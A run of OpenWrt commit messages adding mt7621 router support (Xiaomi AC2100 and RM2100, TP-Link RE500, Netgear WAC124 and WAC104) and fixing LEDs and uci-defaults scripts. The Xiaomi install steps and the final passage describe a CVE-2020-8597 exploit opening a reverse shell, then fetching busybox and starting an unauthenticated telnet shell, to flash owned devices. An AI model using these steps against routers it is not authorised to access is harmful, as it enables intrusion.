Thanks to @namidairo
Here is the detailed guide Hack: https://github.com/impulse/ac2100-openwrt-guide
Guide is written for MacOS but it will work at linux.
needed packages: python3(with scapy), netcat, http server, telnet client
1. Run PPPoE&exploit to get nc and wget busybox, get telnet and wget firmware
2. mtd write openwrt-ramips-mt7621-xiaomi_mi-router-ac2100-kernel1.bin kernel1
3. nvram set uart_en=1
4. nvram set bootdelay=5
5. nvram set flag_try_sys1_failed=1
6. nvram commit
7. mtd -r write openwrt-ramips-mt7621-xiaomi_mi-router-ac2100-rootfs0.bin rootfs0
other than these I specified in here. Everything is same with:
f3792690c4
Thanks for all community and especially for this device:
@Ilyas @scp07 @namidairo @Percy @thorsten97 @impulse (names@forum.openwrt.com)
MAC Locations:
WAN *:b5 = factory 0xe006
LAN *:b6 = factory 0xe000
WIFI 5ghz *:b8 = factory 0x8004
WIFI 2.4ghz *:b7 = factory 0x0004
Signed-off-by: Emir Efe Kucuk <emirefek@gmail.com>
[refactored common image bits into Device/xiaomi-ac2100, fixed From:]
Signed-off-by: Petr Štetiar <ynezz@true.cz>
Hardware
--------
SoC: Mediatek MT7621AT (880 MHz, 2 cores 4 threads)
RAM: 128MB
FLASH: 16MB NOR (Macronix MX25L12805D)
ETH: 1x 10/100/1000 Mbps Ethernet (MT7530)
WIFI:
- 2.4GHz: 1x MT7615 (4x4:4)
- 5GHz: 1x MT7615 (4x4:4)
- 4 antennas: 2 external detachable and 2 internal
BTN:
- 1x Reset button
- 1x WPS button
LEDS:
- 1x Green led (Power)
- 1x Green-Amber-Red led (Wifi)
UART:
- 57600-8-N-1
Everything works correctly.
Installation
------------
Flash the factory image directly from OEM web interface.
(You can login using these credentials: admin/1234)
Restore OEM Firmware
--------------------
Flash the OEM "bin" firmware directly from LUCI.
The firmware is downloadable from the OEM web page.
Warning: Remember to not keep settings!
Warning2: Remember to force the flash.
Restoring procedure tested with RE23_1.08.bin
MAC addresses
-------------
factory 0x4 *:24
factory 0x8004 *:25
Cimage 0x07 *:24
Cimage 0x0D *:24
Cimage 0x13 *:24
Cimage 0x19 *:25
No other addresses were found in factory partition.
Since the label contains both the 2.4GHz and 5GHz mac address I decided
to set the 5GHz one as label-mac-device. Moreover it also corresponds
to the lan mac address.
Notes
-----
The wifi led in the OEM firmware changes colour depending on the signal
strength. This can be done in OpenWrt but just for one interface.
So for now will not be any default action for this led.
If you want to open the case, pay attention to the antenna placed on
the bottom part of the front cover.
The wire is a bit short and it breaks easily. (I broke it)
Signed-off-by: Davide Fioravanti <pantanastyle@gmail.com>
[fix two typos and add extended MAC address section to commit message]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
This moves WiFi LED triggers from 01_leds to device tree.
While at it, convert the labels there to lower case; this is
more commonly used and the change will actually remove competition
between DT trigger and leftover uci config on already installed
systems.
Suggested-by: Georgi Vlaev <georgi.vlaev@gmail.com>
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
This device uses the same hardware as RE650 v1 which got supported in
8c51dde.
Hardware specification:
- SoC 880 MHz - MediaTek MT7621AT
- 128 MB of DDR3 RAM
- 16 MB - Winbond 25Q128FVSG
- 4T4R 2.4 GHz - MediaTek MT7615E
- 4T4R 5 GHz - MediaTek MT7615E
- 1x 1 Gbps Ethernet - MT7621AT integrated
- 7x LEDs (Power, 2G, 5G, WPS(x2), Lan(x2))
- 4x buttons (Reset, Power, WPS, LED)
- UART header (J1) - 2:GND, 3:RX, 4:TX
Serial console @ 57600,8n1
Flash instructions:
Upload
openwrt-ramips-mt7621-tplink_re500-v1-squashfs-factory.bin
from the RE500 web interface.
TFTP recovery to stock firmware:
Unfortunately, I can't find an easy way to recover the RE
without opening the device and using modified binaries. The
TFTP upload will only work if selected from u-boot, which
means you have to open the device and attach to the serial
console. The TFTP update procedure does *not* accept the
published vendor firmware binaries. However, it allows to
flash kernel + rootfs binaries, and this works if you have
a backup of the original contents of the flash. It's probably
possible to create special image out of the vendor binaries
and use that as recovery image.
Signed-off-by: Christoph Krapp <achterin@googlemail.com>
[remove dts-v1 in DTSI, do not touch WiFi LEDs for RE650, keep
state_default in DTS files, fix label-mac-device, use lower case
for WiFi LEDs]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
The WAC124 hardware appears to be identical to R6260/R6350/R6850.
SoC: MediaTek MT7621AT
RAM: 128M DDR3
FLASH: 128M NAND (Macronix MX30LF1G18AC)
WiFI: MediaTek MT7603 bgn 2T2R
MediaTek MT7615 nac 4T4R
ETH: SoC Integrated Gigabit Switch (1x WAN, 4x LAN)
USB: 1x USB 2.0
BTN: Reset, WPS
LED: Power, Internet, WiFi, USB (all green)
Installation:
The factory image can be flashed from the stock firmware web interface
or using nmrpflash. With nmrpflash it is also possible to revert to
stock firmware.
Signed-off-by: Jan Hoffmann <jan@3e8.eu>
This drops the shebang from all target files for /lib and
/etc/uci-defaults folders, as these are sourced and the shebang
is useless.
While at it, fix the executable flag on a few of these files.
This does not touch ar71xx, as this target is just used for
backporting now and applying cosmetic changes would just complicate
things.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
The uci config section network.globals set up in /bin/config_generate
will only be created if /proc/sys/net/ipv6 exists.
Correspondingly, lacking IPv6 support, the command
uci set network.globals.packet_steering=1
will fail with "uci: Invalid argument" as the network.globals config
has not been set up.
Fix that by adding the setup there as well.
Fixes: dfd62e575c6c ("ramips: enable packet steering by default on mt7621")
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
NETGEAR WAC104 is an AP based on castrated R6220, without WAN
port and USB.
SoC: MediaTek MT7621ST
RAM: 128M DDR3
FLASH: 128M NAND
WiFi: MediaTek MT7612EN an+ac
MediaTek MT7603EN bgn
ETH: MediaTek MT7621ST (4x LAN)
BTN: 1x Connect (WPS), 1x WLAN, 1x Reset
LED: 7x (3x GPIO controlled)
Installation:
Log in to the NETGEAR web interface and flash factory.img
Back to stock:
Use nmrpflash to revert to the stock image.
Signed-off-by: Pawel Dembicki <paweldembicki@gmail.com>
Since 01_enable_packet_steering only touches the network config,
limit the uci commit to this as well.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
This partially reverts commit 5acd1ed0be0d ("ramips: mt7621: fix
Ubiquiti ER-X ports names and MAC addresses"), this change was discussed
in https://github.com/openwrt/openwrt/pull/2901#discussion_r407238452
With commit 5acd1ed0be0d ("ramips: mt7621: fix Ubiquiti ER-X ports names
and MAC addresses"), all the ports were put into the LAN bridge, with
the argument that the OEM firmware does not have a WAN port enabled. In
the default OEM setup, all of the ports except eth0 are dead and eth0 is
set to a static IP address without providing DHCP services when
connected. It is only after the wizard has been run that eth0 becomes
the WAN port and all the rest of the ports belong to LAN with DHCP
enabled.
Having all of the ports set to the LAN bridge does not mirror the default
OEM setup. To accomplish that, only eth0 would be in the LAN bridge.
But this is not the expected behaviour of OpenWrt.
Therefore this proposal to set eth0 to WAN and eth1-N to LAN provides
the behaviour expected from OpenWrt, maintains the current
documentation as up-to-date, and does not require the user to manually
detach eth0 from the LAN bridge, create the WAN(6) interface(s), and set
eth0 to the WAN(6) interface(s).
Fixes: 5acd1ed0be0d ("ramips: mt7621: fix Ubiquiti ER-X ports names and MAC addresses")
Signed-off-by: Perry Melange <isprotejesvalkata@gmail.com>
[commit subject and description tweaks]
Signed-off-by: Petr Štetiar <ynezz@true.cz>
Commit f761f4052c4 had bogus case syntax, the uci-defaults script threw
errors as a result and exited non-zero, probably didn't do what was
intended, but tried over and over since the non-zero exit prevents the
script from being deleted.
Fixes: f761f4052c41 ("ramips: mt7621: harmonize naming scheme for Mikrotik")
Signed-off-by: Russell Senior <russell@personaltelco.net>
[extend commit title, add Fixes]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
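The failure mode described in the commit message above, as an added example that is not part of the commit or of OpenWrt's code: a simplified model of a uci-defaults runner that deletes a script only when it returns 0, fed a constructed script with broken case syntax and its corrected form. The board names, file contents and function names are assumptions made for illustration.

```shell
# Simplified model of the behaviour described above: each defaults script is
# sourced in a subshell and removed only when that subshell returns 0.
apply_defaults() {
	defaults_dir="$1"
	for script in "$defaults_dir"/*; do
		[ -f "$script" ] || continue
		( board="example,board-b"; . "$script" ) 2>/dev/null && rm -f "$script"
	done
	return 0
}

# Constructed script: the first case arm lacks its ';;', a shell syntax error.
write_broken() {
	cat > "$1" <<'EOF'
case "$board" in
example,board-a)
	migrated=a
example,board-b)
	migrated=b
	;;
esac
exit 0
EOF
}

# The same constructed script with the case syntax corrected.
write_fixed() {
	cat > "$1" <<'EOF'
case "$board" in
example,board-a)
	migrated=a
	;;
example,board-b)
	migrated=b
	;;
esac
exit 0
EOF
}

# Simulate N boots and print the names of the scripts still left behind.
remaining_after_boots() {
	boots_left="$2"
	while [ "$boots_left" -gt 0 ]; do
		apply_defaults "$1"
		boots_left=$((boots_left - 1))
	done
	ls "$1"
}
```

Running `sh -n` over each file in the uci-defaults directory at build time catches this class of error before an image ships.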
Specification:
- CPU: MediaTek MT7621A
- RAM: 128 MB DDR3
- FLASH: 128 MB ESMT NAND
- WIFI: 2x2 802.11bgn (MT7603)
- WIFI: 4x4 802.11ac (MT7615)
- ETH: 3xLAN+1xWAN 1000base-T
- LED: Power, WAN, in Amber and White
- UART: On board near ethernet, opposite side from power
- Modified u-boot
Installation:
1. Run linked exploit to get shell, startup telnet and wget the files over
2. mtd write openwrt-ramips-mt7621-xiaomi_rm2100-squashfs-kernel1.bin kernel1
3. nvram set uart_en=1
4. nvram set bootdelay=5
5. nvram set flag_try_sys1_failed=1
6. nvram commit
7. mtd -r write openwrt-ramips-mt7621-xiaomi_rm2100-squashfs-rootfs0.bin rootfs0
Restore to stock:
1. Set up PXE and TFTP server serving stock firmware image
(See dhcp-boot option of dnsmasq)
2. Hold reset button down before powering on and wait for flashing amber led
3. Release reset button
4. Wait until status led changes from flashing amber to white
Notes:
This device has dual kernel and rootfs slots like other Xiaomi devices currently
supported (mir3g, etc.) thus, we use the second slot and overwrite the first
rootfs onwards in order to get more space.
Exploit and detailed instructions:
https://openwrt.org/toh/xiaomi/xiaomi_redmi_router_ac2100
An implementation of CVE-2020-8597 against stock firmware version 1.0.14
This requires a computer with ethernet plugged into the wan port and an active
PPPoE session, and if successful will open a reverse shell to 192.168.31.177
on port 31337.
As this shell is somewhat unreliable and likely to be killed in a random amount
of time, it is recommended to wget a static compiled busybox binary onto the
device and start telnetd with it.
The stock telnetd and dropbear unfortunately appear inoperable.
(Disabled on release versions of stock firmware likely)
I.e. wget https://yourip/busybox-mipsel -O /tmp/busybox
chmod a+x /tmp/busybox
/tmp/busybox telnetd -l /bin/sh
Tested-by: David Martinez <bonkilla@gmail.com>
Signed-off-by: Richard Huynh <voxlympha@gmail.com>